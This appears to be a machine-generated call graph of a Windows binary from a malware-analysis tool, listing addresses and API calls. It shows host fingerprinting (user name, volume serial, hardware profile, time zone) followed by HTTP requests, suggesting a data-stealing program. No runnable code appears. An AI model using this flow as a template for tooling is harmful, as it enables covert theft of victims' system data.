72496->73627 72497 413a40 24 API calls 72497->72594 72498 402510 lstrcpy 72498->72594 72500 4151a3 72499->72500 73622 402570 lstrcpy 72500->73622 72504 40ff00 lstrcpy 72504->72594 72505 4152df 72508 40ff00 lstrcpy 72505->72508 72506 4151ac 72509 40ff00 lstrcpy 72506->72509 72507 414a8b StrCmpCA 72511 415085 72507->72511 72507->72594 72512 4152ef 72508->72512 72510 4151bc 72509->72510 73623 4027a0 lstrcpy 72510->73623 72513 40ff00 lstrcpy 72511->72513 72517 40fe60 lstrcpy 72512->72517 72516 415094 72513->72516 72514 402570 lstrcpy 72514->72594 72515 4025a0 lstrcpy 72515->72594 73620 402600 lstrcpy 72516->73620 72521 415308 72517->72521 72525 40fe60 lstrcpy 72521->72525 72522 4151d0 72526 40ff00 lstrcpy 72522->72526 72523 41509d 72527 40ff00 lstrcpy 72523->72527 72524 414c5e StrCmpCA 72528 414f70 72524->72528 72524->72594 72529 415318 72525->72529 72530 4151e0 72526->72530 72531 4150ad 72527->72531 72534 40ff00 lstrcpy 72528->72534 72533 40fe60 lstrcpy 72529->72533 72538 40fe60 lstrcpy 72530->72538 73621 4027d0 lstrcpy 72531->73621 72532 402630 lstrcpy 72532->72594 72595 414ee3 72533->72595 72535 414f7c 72534->72535 73618 402690 lstrcpy 72535->73618 72536 41480a StrCmpCA 72536->72594 72541 4151f9 72538->72541 72545 40fe60 lstrcpy 72541->72545 72542 4150c1 72546 40ff00 lstrcpy 72542->72546 72543 414f85 72548 40ff00 lstrcpy 72543->72548 72544 401120 lstrcpy 72544->72594 72549 415209 72545->72549 72550 4150d1 72546->72550 72547 414e3d StrCmpCA 72551 414e58 72547->72551 72552 414e48 Sleep 72547->72552 72553 414f95 72548->72553 72555 40fe60 lstrcpy 72549->72555 72560 40fe60 lstrcpy 72550->72560 72554 40ff00 lstrcpy 72551->72554 72552->72594 73619 402800 lstrcpy 72553->73619 72557 414e67 72554->72557 72555->72595 72556 4026c0 lstrcpy 72556->72594 73616 402720 lstrcpy 72557->73616 72558 4149e9 StrCmpCA 72558->72594 72563 4150ea 72560->72563 72567 40fe60 lstrcpy 72563->72567 72564 414e70 72568 40ff00 lstrcpy 72564->72568 72565 414fac 72569 40ff00 lstrcpy 72565->72569 72566 402600 lstrcpy 72566->72594 72570 4150fa 72567->72570 72571 414e80 72568->72571 72572 414fbc 72569->72572 72574 40fe60 lstrcpy 72570->72574 73617 402830 lstrcpy 72571->73617 72578 40fe60 lstrcpy 72572->72578 72573 413b80 29 API calls 72573->72594 72574->72595 72575 402720 lstrcpy 72575->72594 72576 414bc9 StrCmpCA 72576->72594 72581 414fd8 72578->72581 72579 414e97 72582 40ff00 lstrcpy 72579->72582 72580 402690 lstrcpy 72580->72594 72583 40fe60 lstrcpy 72581->72583 72584 414ea7 72582->72584 72585 414fe8 72583->72585 72588 40fe60 lstrcpy 72584->72588 72586 40fe60 lstrcpy 72585->72586 72586->72595 72587 414da8 StrCmpCA 72587->72594 72589 414ec3 72588->72589 72590 40fe60 lstrcpy 72589->72590 72591 414ed3 72590->72591 72592 40fe60 lstrcpy 72591->72592 72592->72595 72593 40fe60 lstrcpy 72593->72594 72594->72483 72594->72485 72594->72486 72594->72487 72594->72494 72594->72497 72594->72498 72594->72504 72594->72507 72594->72514 72594->72515 72594->72524 72594->72532 72594->72536 72594->72544 72594->72547 72594->72556 72594->72558 72594->72566 72594->72573 72594->72575 72594->72576 72594->72580 72594->72587 72594->72593 73609 4024b0 72594->73609 73612 402540 lstrcpy 72594->73612 73613 4025d0 lstrcpy 72594->73613 73614 402660 lstrcpy 72594->73614 73615 4026f0 lstrcpy 72594->73615 72595->71716 72597 40fe77 72596->72597 72598 40fe8e 72597->72598 72599 40fe86 lstrcpy 72597->72599 72598->71729 72599->72598 72601 40ff9b 72600->72601 72602 40ffc5 72601->72602 72603 40ffb1 lstrcpy lstrcat 72601->72603 72602->71735 72603->72602 72604->71739 72606 40fe20 lstrcpy 72605->72606 72607 40246b 72606->72607 72608 410d30 GetWindowsDirectoryA 72607->72608 72609 410d72 72608->72609 72610 410d79 GetVolumeInformationA 72608->72610 72609->72610 72611 410db0 72610->72611 72612 410de6 GetProcessHeap HeapAlloc 72611->72612 72613 410e00 72612->72613 72614 410e1c wsprintfA lstrcat 72612->72614 72615 40fe20 lstrcpy 72613->72615 73628 410cd0 GetCurrentHwProfileA 72614->73628 72617 410e0b 72615->72617 72617->71745 72618 410e4f 72619 410e61 lstrlen 72618->72619 72620 410e76 72619->72620 73635 411b50 lstrcpy malloc strncpy 72620->73635 72622 410e80 72623 410e8e lstrcat 72622->72623 72624 410ea2 72623->72624 72625 40fe20 lstrcpy 72624->72625 72626 410eb5 72625->72626 72626->71745 72628 40fe60 lstrcpy 72627->72628 72629 404540 72628->72629 73636 404430 72629->73636 72631 40454c 72632 40fe20 lstrcpy 72631->72632 72633 40456d 72632->72633 72634 40fe20 lstrcpy 72633->72634 72635 404581 72634->72635 72636 40fe20 lstrcpy 72635->72636 72637 404592 72636->72637 72638 40fe20 lstrcpy 72637->72638 72639 4045a3 72638->72639 72640 40fe20 lstrcpy 72639->72640 72641 4045b4 72640->72641 72642 4045c9 InternetOpenA StrCmpCA 72641->72642 72643 4045f4 72642->72643 72644 404b68 InternetCloseHandle 72643->72644 73644 411450 72643->73644 72658 404b7a 72644->72658 72646 40460e 72647 40ff50 2 API calls 72646->72647 72648 404622 72647->72648 72649 40ff00 lstrcpy 72648->72649 72650 40462f 72649->72650 72651 40ffe0 3 API calls 72650->72651 72652 404657 72651->72652 72653 40ff00 lstrcpy 72652->72653 72654 404664 72653->72654 72655 40ffe0 3 API calls 72654->72655 72656 404680 72655->72656 72657 40ff00 lstrcpy 72656->72657 72659 40468d 72657->72659 72658->71749 72660 40ff50 2 API calls 72659->72660 72661 4046a8 72660->72661 72662 40ff00 lstrcpy 72661->72662 72663 4046b5 72662->72663 72664 40ffe0 3 API calls 72663->72664 72665 4046d1 72664->72665 72666 40ff00 lstrcpy 72665->72666 72667 4046de 72666->72667 72668 40ffe0 3 API calls 72667->72668 72669 4046fa 72668->72669 72670 40ff00 lstrcpy 72669->72670 72671 404707 72670->72671 72672 40ffe0 3 API calls 72671->72672 72673 404724 72672->72673 72674 40ff50 2 API calls 72673->72674 72675 404737 72674->72675 72676 40ff00 lstrcpy 72675->72676 72677 404744 72676->72677 72678 40475b InternetConnectA 72677->72678 72678->72644 72679 404787 HttpOpenRequestA 72678->72679 72680 4047c5 72679->72680 72681 404b5b InternetCloseHandle 72679->72681 72682 4047e1 72680->72682 72683 4047cb InternetSetOptionA 72680->72683 72681->72644 72684 40ffe0 3 API calls 72682->72684 72683->72682 72685 4047f2 72684->72685 72686 40ff00 lstrcpy 72685->72686 72687 4047ff 72686->72687 72688 40ff50 2 API calls 72687->72688 72689 40481a 72688->72689 72690 40ff00 lstrcpy 72689->72690 72691 404827 72690->72691 72692 40ffe0 3 API calls 72691->72692 72693 404843 72692->72693 72694 40ff00 lstrcpy 72693->72694 72695 404850 72694->72695 72696 40ffe0 3 API calls 72695->72696 72697 40486e 72696->72697 72698 40ff00 lstrcpy 72697->72698 72699 40487b 72698->72699 72700 40ffe0 3 API calls 72699->72700 72701 404897 72700->72701 72702 40ff00 lstrcpy 72701->72702 72703 4048a4 72702->72703 72704 40ffe0 3 API calls 72703->72704 72705 4048c0 72704->72705 72706 40ff00 lstrcpy 72705->72706 72707 4048cd 72706->72707 72708 40ff50 2 API calls 72707->72708 72709 4048e8 72708->72709 72710 40ff00 lstrcpy 72709->72710 72711 4048f5 72710->72711 72712 40ffe0 3 API calls 72711->72712 72713 404911 72712->72713 72714 40ff00 lstrcpy 72713->72714 72715 40491e 72714->72715 72716 40ffe0 3 API calls 72715->72716 72717 40493a 72716->72717 72718 40ff00 lstrcpy 72717->72718 72719 404947 72718->72719 72720 40ff50 2 API calls 72719->72720 72721 404962 72720->72721 72722 40ff00 lstrcpy 72721->72722 72723 40496f 72722->72723 72724 40ffe0 3 API calls 72723->72724 72725 40498b 72724->72725 72726 40ff00 lstrcpy 72725->72726 72727 404998 72726->72727 72728 40ffe0 3 API calls 72727->72728 72729 4049b6 72728->72729 72730 40ff00 lstrcpy 72729->72730 72731 4049c3 72730->72731 72732 40ffe0 3 API calls 72731->72732 72733 4049df 72732->72733 72734 40ff00 lstrcpy 72733->72734 72735 4049ec 72734->72735 72736 40ffe0 3 API calls 72735->72736 72737 404a08 72736->72737 72738 40ff00 lstrcpy 72737->72738 72739 404a15 72738->72739 72740 40ff50 2 API calls 72739->72740 72741 404a30 72740->72741 72742 40ff00 lstrcpy 72741->72742 72743 404a3d 72742->72743 72744 40fe20 lstrcpy 72743->72744 72745 404a55 72744->72745 72746 40ff50 2 API calls 72745->72746 72747 404a69 72746->72747 72748 40ff50 2 API calls 72747->72748 72749 404a7c 72748->72749 72750 40ff00 lstrcpy 72749->72750 72751 404a89 72750->72751 72752 404aa9 lstrlen 72751->72752 72753 404ab9 72752->72753 72754 404ac2 lstrlen 72753->72754 73650 4100c0 72754->73650 72756 404ad2 HttpSendRequestA InternetReadFile 72757 404af5 72756->72757 72758 404b49 InternetCloseHandle 72756->72758 72757->72758 72762 404afc 72757->72762 73651 40fea0 72758->73651 72760 40ffe0 3 API calls 72760->72762 72761 40ff00 lstrcpy 72761->72762 72762->72760 72762->72761 72763 404b2e InternetReadFile 72762->72763 72763->72757 72763->72758 73655 4100c0 72764->73655 72766 4127d7 StrCmpCA 72767 4127e2 ExitProcess 72766->72767 72768 4127e9 72766->72768 72769 4127f9 strtok_s 72768->72769 72770 41294b 72769->72770 72783 41280a 72769->72783 72770->71751 72771 41292f strtok_s 72771->72770 72771->72783 72772 4128e1 StrCmpCA 72772->72771 72773 412840 StrCmpCA 72773->72771 72773->72783 72774 4128a2 StrCmpCA 72774->72771 72774->72783 72775 412824 StrCmpCA 72775->72771 72775->72783 72776 4128b7 StrCmpCA 72776->72771 72776->72783 72777 4128f7 StrCmpCA 72777->72771 72778 412878 StrCmpCA 72778->72771 72778->72783 72779 41291b StrCmpCA 72779->72771 72780 41285c StrCmpCA 72780->72771 72780->72783 72781 4128cc StrCmpCA 72781->72771 72781->72783 72782 40feb0 2 API calls 72782->72783 72783->72771 72783->72772 72783->72773 72783->72774 72783->72775 72783->72776 72783->72777 72783->72778 72783->72779 72783->72780 72783->72781 72783->72782 72785 40fe60 lstrcpy 72784->72785 72786 405d20 72785->72786 72787 404430 5 API calls 72786->72787 72788 405d2c 72787->72788 72789 40fe20 lstrcpy 72788->72789 72790 405d4d 72789->72790 72791 40fe20 lstrcpy 72790->72791 72792 405d61 72791->72792 72793 40fe20 lstrcpy 72792->72793 72794 405d72 72793->72794 72795 40fe20 lstrcpy 72794->72795 72796 405d83 72795->72796 72797 40fe20 lstrcpy 72796->72797 72798 405d94 72797->72798 72799 405da9 InternetOpenA StrCmpCA 72798->72799 72800 405dd4 72799->72800 72801 4064bf InternetCloseHandle 72800->72801 72803 411450 2 API calls 72800->72803 72802 4064d5 72801->72802 73662 406f50 CryptStringToBinaryA 72802->73662 72804 405dee 72803->72804 72805 40ff50 2 API calls 72804->72805 72807 405e02 72805->72807 72809 40ff00 lstrcpy 72807->72809 72808 4064db 72810 40feb0 2 API calls 72808->72810 72826 406509 72808->72826 72813 405e0f 72809->72813 72811 4064ee 72810->72811 72812 40ffe0 3 API calls 72811->72812 72814 4064fd 72812->72814 72816 40ffe0 3 API calls 72813->72816 72815 40ff00 lstrcpy 72814->72815 72815->72826 72817 405e37 72816->72817 72818 40ff00 lstrcpy 72817->72818 72819 405e44 72818->72819 72820 40ffe0 3 API calls 72819->72820 72821 405e60 72820->72821 72822 40ff00 lstrcpy 72821->72822 72823 405e6d 72822->72823 72824 40ff50 2 API calls 72823->72824 72825 405e88 72824->72825 72827 40ff00 lstrcpy 72825->72827 72826->71757 72828 405e95 72827->72828 72829 40ffe0 3 API calls 72828->72829 72830 405eb1 72829->72830 72831 40ff00 lstrcpy 72830->72831 72832 405ebe 72831->72832 72833 40ffe0 3 API calls 72832->72833 72834 405eda 72833->72834 72835 40ff00 lstrcpy 72834->72835 72836 405ee7 72835->72836 72837 40ffe0 3 API calls 72836->72837 72838 405f04 72837->72838 72839 40ff50 2 API calls 72838->72839 72840 405f17 72839->72840 72841 40ff00 lstrcpy 72840->72841 72842 405f24 72841->72842 72843 405f3b InternetConnectA 72842->72843 72844 405f67 HttpOpenRequestA 72843->72844 72845 4064bc 72843->72845 72846 4064b5 InternetCloseHandle 72844->72846 72847 405fa5 72844->72847 72845->72801 72846->72845 72848 405fc1 72847->72848 72849 405fab InternetSetOptionA 72847->72849 72850 40ffe0 3 API calls 72848->72850 72849->72848 72851 405fd2 72850->72851 72852 40ff00 lstrcpy 72851->72852 72853 405fdf 72852->72853 72854 40ff50 2 API calls 72853->72854 72855 405ffa 72854->72855 72856 40ff00 lstrcpy 72855->72856 72857 406007 72856->72857 72858 40ffe0 3 API calls 72857->72858 72859 406023 72858->72859 72860 40ff00 lstrcpy 72859->72860 72861 406030 72860->72861 72862 40ffe0 3 API calls 72861->72862 72863 40604d 72862->72863 72864 40ff00 lstrcpy 72863->72864 72865 40605a 72864->72865 72866 40ffe0 3 API calls 72865->72866 72867 406078 72866->72867 72868 40ff00 lstrcpy 72867->72868 72869 406085 72868->72869 72870 40ffe0 3 API calls 72869->72870 72871 4060a1 72870->72871 72872 40ff00 lstrcpy 72871->72872 72873 4060ae 72872->72873 72874 40ff50 2 API calls 72873->72874 72875 4060c9 72874->72875 72876 40ff00 lstrcpy 72875->72876 72877 4060d6 72876->72877 72878 40ffe0 3 API calls 72877->72878 72879 4060f2 72878->72879 72880 40ff00 lstrcpy 72879->72880 72881 4060ff 72880->72881 72882 40ffe0 3 API calls 72881->72882 72883 40611b 72882->72883 72884 40ff00 lstrcpy 72883->72884 72885 406128 72884->72885 72886 40ff50 2 API calls 72885->72886 72887 406143 72886->72887 72888 40ff00 lstrcpy 72887->72888 72889 406150 72888->72889 72890 40ffe0 3 API calls 72889->72890 72891 40616c 72890->72891 72892 40ff00 lstrcpy 72891->72892 72893 406179 72892->72893 72894 40ffe0 3 API calls 72893->72894 72895 406196 72894->72895 72896 40ff00 lstrcpy 72895->72896 72897 4061a3 72896->72897 72898 40ffe0 3 API calls 72897->72898 72899 4061bf 72898->72899 72900 40ff00 lstrcpy 72899->72900 72901 4061cc 72900->72901 72902 40ffe0 3 API calls 72901->72902 72903 4061e8 72902->72903 72904 40ff00 lstrcpy 72903->72904 72905 4061f5 72904->72905 72906 402450 lstrcpy 72905->72906 72907 406209 72906->72907 72908 40ff50 2 API calls 72907->72908 72909 40621d 72908->72909 72910 40ff00 lstrcpy 72909->72910 72911 40622a 72910->72911 72912 40ffe0 3 API calls 72911->72912 72913 406252 72912->72913 72914 40ff00 lstrcpy 72913->72914 72915 40625f 72914->72915 72916 40ffe0 3 API calls 72915->72916 72917 40627b 72916->72917 72918 40ff00 lstrcpy 72917->72918 72919 406288 72918->72919 72920 40ff50 2 API calls 72919->72920 72921 4062a3 72920->72921 72922 40ff00 lstrcpy 72921->72922 72923 4062b0 72922->72923 72924 40ffe0 3 API calls 72923->72924 72925 4062cc 72924->72925 72926 40ff00 lstrcpy 72925->72926 72927 4062d9 72926->72927 72928 40ffe0 3 API calls 72927->72928 72929 4062f7 72928->72929 72930 40ff00 lstrcpy 72929->72930 72931 406304 72930->72931 72932 40ffe0 3 API calls 72931->72932 72933 406320 72932->72933 72934 40ff00 lstrcpy 72933->72934 72935 40632d 72934->72935 72936 40ffe0 3 API calls 72935->72936 72937 406349 72936->72937 72938 40ff00 lstrcpy 72937->72938 72939 406356 72938->72939 72940 40ff50 2 API calls 72939->72940 72941 406371 72940->72941 72942 40ff00 lstrcpy 72941->72942 72943 40637e 72942->72943 72944 406391 lstrlen 72943->72944 73656 4100c0 72944->73656 72946 4063a2 lstrlen GetProcessHeap HeapAlloc 73657 4100c0 72946->73657 72948 4063c5 lstrlen 73658 4100c0 72948->73658 72950 4063d5 memcpy 73659 4100c0 72950->73659 72952 4063e7 lstrlen 72953 4063f7 72952->72953 72954 406400 lstrlen memcpy 72953->72954 73660 4100c0 72954->73660 72956 40641c lstrlen 73661 4100c0 72956->73661 72958 40642c HttpSendRequestA InternetReadFile 72959 4064a8 InternetCloseHandle 72958->72959 72961 406452 72958->72961 72959->72846 72960 40ffe0 3 API calls 72960->72961 72961->72959 72961->72960 72962 40ff00 lstrcpy 72961->72962 72963 40648d InternetReadFile 72961->72963 72962->72961 72963->72959 72963->72961 73667 4100c0 72964->73667 72966 41218f strtok_s 72967 41219c 72966->72967 72971 4121f9 72966->72971 72968 40feb0 2 API calls 72967->72968 72969 4121e2 strtok_s 72967->72969 72970 40feb0 2 API calls 72967->72970 72968->72969 72969->72967 72969->72971 72970->72967 72971->71759 73668 4100c0 72972->73668 72974 411fdf strtok_s 72975 41210d 72974->72975 72982 411ff0 72974->72982 72975->71767 72976 4120f2 strtok_s 72976->72975 72976->72982 72977 4120c4 StrCmpCA 72977->72982 72978 412026 StrCmpCA 72978->72982 72979 412098 StrCmpCA 72979->72982 72980 41206c StrCmpCA 72980->72982 72981 40feb0 lstrlen lstrcpy 72981->72982 72982->72976 72982->72977 72982->72978 72982->72979 72982->72980 72982->72981 72984 40fe20 lstrcpy 72983->72984 72985 415693 72984->72985 72986 40ffe0 3 API calls 72985->72986 72987 4156a9 72986->72987 72988 40ff00 lstrcpy 72987->72988 72989 4156b6 72988->72989 73669 402420 72989->73669 72992 40ff50 2 API calls 72993 4156de 72992->72993 72994 40ff00 lstrcpy 72993->72994 72995 4156eb 72994->72995 72996 40ffe0 3 API calls 72995->72996 72997 415713 72996->72997 72998 40ff00 lstrcpy 72997->72998 72999 415720 72998->72999 73000 40ffe0 3 API calls 72999->73000 73001 41573c 73000->73001 73002 40ff00 lstrcpy 73001->73002 73003 415749 73002->73003 73004 40ffe0 3 API calls 73003->73004 73005 415765 73004->73005 73006 40ff00 lstrcpy 73005->73006 73007 415772 73006->73007 73672 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 73007->73672 73009 415782 73010 40ffe0 3 API calls 73009->73010 73011 41578f 73010->73011 73012 40ff00 lstrcpy 73011->73012 73013 41579c 73012->73013 73014 40ffe0 3 API calls 73013->73014 73015 4157b8 73014->73015 73016 40ff00 lstrcpy 73015->73016 73017 4157c5 73016->73017 73018 40ffe0 3 API calls 73017->73018 73019 4157e1 73018->73019 73020 40ff00 lstrcpy 73019->73020 73021 4157ee 73020->73021 73673 410c30 memset RegOpenKeyExA 73021->73673 73023 4157fe 73024 40ffe0 3 API calls 73023->73024 73025 41580b 73024->73025 73026 40ff00 lstrcpy 73025->73026 73027 415818 73026->73027 73028 40ffe0 3 API calls 73027->73028 73029 415834 73028->73029 73030 40ff00 lstrcpy 73029->73030 73031 415841 73030->73031 73032 40ffe0 3 API calls 73031->73032 73033 41585d 73032->73033 73034 40ff00 lstrcpy 73033->73034 73035 41586a 73034->73035 73036 410cd0 2 API calls 73035->73036 73037 41587e 73036->73037 73038 40ff50 2 API calls 73037->73038 73039 415892 73038->73039 73040 40ff00 lstrcpy 73039->73040 73041 41589f 73040->73041 73042 40ffe0 3 API calls 73041->73042 73043 4158c7 73042->73043 73044 40ff00 lstrcpy 73043->73044 73045 4158d4 73044->73045 73046 40ffe0 3 API calls 73045->73046 73047 4158f0 73046->73047 73048 40ff00 lstrcpy 73047->73048 73049 4158fd 73048->73049 73050 410d30 12 API calls 73049->73050 73051 415911 73050->73051 73052 40ff50 2 API calls 73051->73052 73053 415925 73052->73053 73054 40ff00 lstrcpy 73053->73054 73055 415932 73054->73055 73056 40ffe0 3 API calls 73055->73056 73057 41595a 73056->73057 73058 40ff00 lstrcpy 73057->73058 73059 415967 73058->73059 73060 40ffe0 3 API calls 73059->73060 73061 415983 73060->73061 73062 40ff00 lstrcpy 73061->73062 73063 415990 73062->73063 73064 41599b GetCurrentProcessId 73063->73064 73676 4119c0 OpenProcess 73064->73676 73067 40ff50 2 API calls 73068 4159bf 73067->73068 73069 40ff00 lstrcpy 73068->73069 73070 4159cc 73069->73070 73071 40ffe0 3 API calls 73070->73071 73072 4159f4 73071->73072 73073 40ff00 lstrcpy 73072->73073 73074 415a01 73073->73074 73075 40ffe0 3 API calls 73074->73075 73076 415a1d 73075->73076 73077 40ff00 lstrcpy 73076->73077 73078 415a2a 73077->73078 73079 40ffe0 3 API calls 73078->73079 73080 415a46 73079->73080 73081 40ff00 lstrcpy 73080->73081 73082 415a53 73081->73082 73083 40ffe0 3 API calls 73082->73083 73084 415a6f 73083->73084 73085 40ff00 lstrcpy 73084->73085 73086 415a7c 73085->73086 73681 410ee0 GetProcessHeap HeapAlloc 73086->73681 73088 415a8c 73089 40ffe0 3 API calls 73088->73089 73090 415a99 73089->73090 73091 40ff00 lstrcpy 73090->73091 73092 415aa6 73091->73092 73093 40ffe0 3 API calls 73092->73093 73094 415ac2 73093->73094 73095 40ff00 lstrcpy 73094->73095 73096 415acf 73095->73096 73097 40ffe0 3 API calls 73096->73097 73098 415aeb 73097->73098 73099 40ff00 lstrcpy 73098->73099 73100 415af8 73099->73100 73688 411020 CoInitializeEx CoInitializeSecurity CoCreateInstance 73100->73688 73102 415b0c 73103 40ff50 2 API calls 73102->73103 73104 415b20 73103->73104 73105 40ff00 lstrcpy 73104->73105 73106 415b2d 73105->73106 73107 40ffe0 3 API calls 73106->73107 73108 415b55 73107->73108 73109 40ff00 lstrcpy 73108->73109 73110 415b62 73109->73110 73111 40ffe0 3 API calls 73110->73111 73112 415b7e 73111->73112 73113 40ff00 lstrcpy 73112->73113 73114 415b8b 73113->73114 73702 4111e0 CoInitializeEx CoInitializeSecurity CoCreateInstance 73114->73702 73116 415b9f 73117 40ff50 2 API calls 73116->73117 73118 415bb3 73117->73118 73119 40ff00 lstrcpy 73118->73119 73120 415bc0 73119->73120 73121 40ffe0 3 API calls 73120->73121 73122 415be8 73121->73122 73123 40ff00 lstrcpy 73122->73123 73124 415bf5 73123->73124 73125 40ffe0 3 API calls 73124->73125 73126 415c11 73125->73126 73127 40ff00 lstrcpy 73126->73127 73128 415c1e 73127->73128 73129 410260 3 API calls 73128->73129 73130 415c2e 73129->73130 73131 40ffe0 3 API calls 73130->73131 73132 415c3b 73131->73132 73133 40ff00 lstrcpy 73132->73133 73134 415c48 73133->73134 73135 40ffe0 3 API calls 73134->73135 73136 415c64 73135->73136 73137 40ff00 lstrcpy 73136->73137 73138 415c71 73137->73138 73139 40ffe0 3 API calls 73138->73139 73140 415c8d 73139->73140 73141 40ff00 lstrcpy 73140->73141 73142 415c9a 73141->73142 73716 410220 GetProcessHeap HeapAlloc GetUserNameA 73142->73716 73144 415caa 73145 40ffe0 3 API calls 73144->73145 73146 415cb7 73145->73146 73147 40ff00 lstrcpy 73146->73147 73148 415cc4 73147->73148 73149 40ffe0 3 API calls 73148->73149 73150 415ce0 73149->73150 73151 40ff00 lstrcpy 73150->73151 73152 415ced 73151->73152 73153 40ffe0 3 API calls 73152->73153 73154 415d09 73153->73154 73155 40ff00 lstrcpy 73154->73155 73156 415d16 73155->73156 73717 410bb0 7 API calls 73156->73717 73159 40ff50 2 API calls 73160 415d3e 73159->73160 73161 40ff00 lstrcpy 73160->73161 73162 415d4b 73161->73162 73163 40ffe0 3 API calls 73162->73163 73164 415d73 73163->73164 73165 40ff00 lstrcpy 73164->73165 73166 415d80 73165->73166 73167 40ffe0 3 API calls 73166->73167 73168 415d9c 73167->73168 73169 40ff00 lstrcpy 73168->73169 73170 415da9 73169->73170 73720 410370 73170->73720 73173 40ff50 2 API calls 73174 415dd4 73173->73174 73175 40ff00 lstrcpy 73174->73175 73176 415de1 73175->73176 73177 40ffe0 3 API calls 73176->73177 73178 415e0f 73177->73178 73179 40ff00 lstrcpy 73178->73179 73180 415e1c 73179->73180 73181 40ffe0 3 API calls 73180->73181 73182 415e3b 73181->73182 73183 40ff00 lstrcpy 73182->73183 73184 415e48 73183->73184 73730 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 73184->73730 73186 415e58 73187 40ffe0 3 API calls 73186->73187 73188 415e65 73187->73188 73189 40ff00 lstrcpy 73188->73189 73190 415e72 73189->73190 73191 40ffe0 3 API calls 73190->73191 73192 415e91 73191->73192 73193 40ff00 lstrcpy 73192->73193 73194 415e9e 73193->73194 73195 40ffe0 3 API calls 73194->73195 73196 415ec0 73195->73196 73197 40ff00 lstrcpy 73196->73197 73198 415ecd 73197->73198 73731 410300 GetProcessHeap HeapAlloc GetTimeZoneInformation 73198->73731 73201 40ffe0 3 API calls 73202 415ef0 73201->73202 73203 40ff00 lstrcpy 73202->73203 73204 415efd 73203->73204 73205 40ffe0 3 API calls 73204->73205 73206 415f1f 73205->73206 73207 40ff00 lstrcpy 73206->73207 73208 415f2c 73207->73208 73209 40ffe0 3 API calls 73208->73209 73210 415f4e 73209->73210 73211 40ff00 lstrcpy 73210->73211 73212 415f5b 73211->73212 73213 40ffe0 3 API calls 73212->73213 73214 415f7d 73213->73214 73215 40ff00 lstrcpy 73214->73215 73216 415f8a 73215->73216 73734 4104d0 GetProcessHeap HeapAlloc RegOpenKeyExA 73216->73734 73218 415f9d 73219 40ffe0 3 API calls 73218->73219 73220 415fad 73219->73220 73221 40ff00 lstrcpy 73220->73221 73222 415fba 73221->73222 73223 40ffe0 3 API calls 73222->73223 73224 415fdc 73223->73224 73225 40ff00 lstrcpy 73224->73225 73226 415fe9 73225->73226 73227 40ffe0 3 API calls 73226->73227 73228 416008 73227->73228 73229 40ff00 lstrcpy 73228->73229 73230 416015 73229->73230 73737 410580 GetLogicalProcessorInformationEx 73230->73737 73232 416025 73233 40ffe0 3 API calls 73232->73233 73234 416032 73233->73234 73235 40ff00 lstrcpy 73234->73235 73236 41603f 73235->73236 73237 40ffe0 3 API calls 73236->73237 73238 41605e 73237->73238 73239 40ff00 lstrcpy 73238->73239 73240 41606b 73239->73240 73241 40ffe0 3 API calls 73240->73241 73242 41608a 73241->73242 73243 40ff00 lstrcpy 73242->73243 73244 416097 73243->73244 73753 410540 GetSystemInfo wsprintfA 73244->73753 73246 4160a7 73247 40ffe0 3 API calls 73246->73247 73248 4160b4 73247->73248 73249 40ff00 lstrcpy 73248->73249 73250 4160c1 73249->73250 73251 40ffe0 3 API calls 73250->73251 73252 4160e0 73251->73252 73253 40ff00 lstrcpy 73252->73253 73254 4160ed 73253->73254 73255 40ffe0 3 API calls 73254->73255 73256 41610c 73255->73256 73257 40ff00 lstrcpy 73256->73257 73258 416119 73257->73258 73754 410680 GetProcessHeap HeapAlloc 73258->73754 73260 416129 73261 40ffe0 3 API calls 73260->73261 73262 416136 73261->73262 73263 40ff00 lstrcpy 73262->73263 73264 416143 73263->73264 73265 40ffe0 3 API calls 73264->73265 73266 416162 73265->73266 73267 40ff00 lstrcpy 73266->73267 73268 41616f 73267->73268 73269 40ffe0 3 API calls 73268->73269 73270 416191 73269->73270 73271 40ff00 lstrcpy 73270->73271 73272 41619e 73271->73272 73273 40ffe0 3 API calls 73272->73273 73274 4161c0 73273->73274 73275 40ff00 lstrcpy 73274->73275 73276 4161cd 73275->73276 73759 4106f0 73276->73759 73279 40ff50 2 API calls 73280 4161fe 73279->73280 73281 40ff00 lstrcpy 73280->73281 73282 41620b 73281->73282 73283 40ffe0 3 API calls 73282->73283 73284 41623c 73283->73284 73285 40ff00 lstrcpy 73284->73285 73286 416249 73285->73286 73287 40ffe0 3 API calls 73286->73287 73288 41626b 73287->73288 73289 40ff00 lstrcpy 73288->73289 73290 416278 73289->73290 73767 410aa0 73290->73767 73292 416292 73293 40ff50 2 API calls 73292->73293 73294 4162a9 73293->73294 73295 40ff00 lstrcpy 73294->73295 73296 4162b6 73295->73296 73297 40ffe0 3 API calls 73296->73297 73298 4162e7 73297->73298 73299 40ff00 lstrcpy 73298->73299 73300 4162f4 73299->73300 73301 40ffe0 3 API calls 73300->73301 73302 416316 73301->73302 73303 40ff00 lstrcpy 73302->73303 73304 416323 73303->73304 73776 410800 73304->73776 73306 416342 73307 40ff50 2 API calls 73306->73307 73308 416359 73307->73308 73309 40ff00 lstrcpy 73308->73309 73310 416366 73309->73310 73311 410800 17 API calls 73310->73311 73312 416394 73311->73312 73313 40ff50 2 API calls 73312->73313 73314 4163ab 73313->73314 73315 40ff00 lstrcpy 73314->73315 73316 4163b8 73315->73316 73317 40ffe0 3 API calls 73316->73317 73318 4163e6 73317->73318 73319 40ff00 lstrcpy 73318->73319 73320 4163f3 73319->73320 73321 416406 lstrlen 73320->73321 73322 416416 73321->73322 73323 40fe20 lstrcpy 73322->73323 73324 41642c 73323->73324 73325 401120 lstrcpy 73324->73325 73326 416444 73325->73326 73796 4153e0 73326->73796 73328 416450 73328->71771 73330 40fe60 lstrcpy 73329->73330 73331 404c39 73330->73331 73332 404430 5 API calls 73331->73332 73333 404c45 GetProcessHeap RtlAllocateHeap 73332->73333 74061 4100c0 73333->74061 73335 404c7f InternetOpenA StrCmpCA 73336 404ca0 73335->73336 73337 404e08 InternetCloseHandle 73336->73337 73338 404cae InternetConnectA 73336->73338 73345 404e1b 73337->73345 73339 404cd4 HttpOpenRequestA 73338->73339 73340 404dfe InternetCloseHandle 73338->73340 73341 404df4 InternetCloseHandle 73339->73341 73342 404d0c 73339->73342 73340->73337 73341->73340 73343 404d10 InternetSetOptionA 73342->73343 73344 404d29 HttpSendRequestA HttpQueryInfoA 73342->73344 73343->73344 73346 404d5e 73344->73346 73349 404d91 73344->73349 73345->71777 73346->71777 73347 404df1 73347->73341 73348 404db0 InternetReadFile 73348->73347 73348->73349 73349->73346 73349->73347 73349->73348 74062 406da0 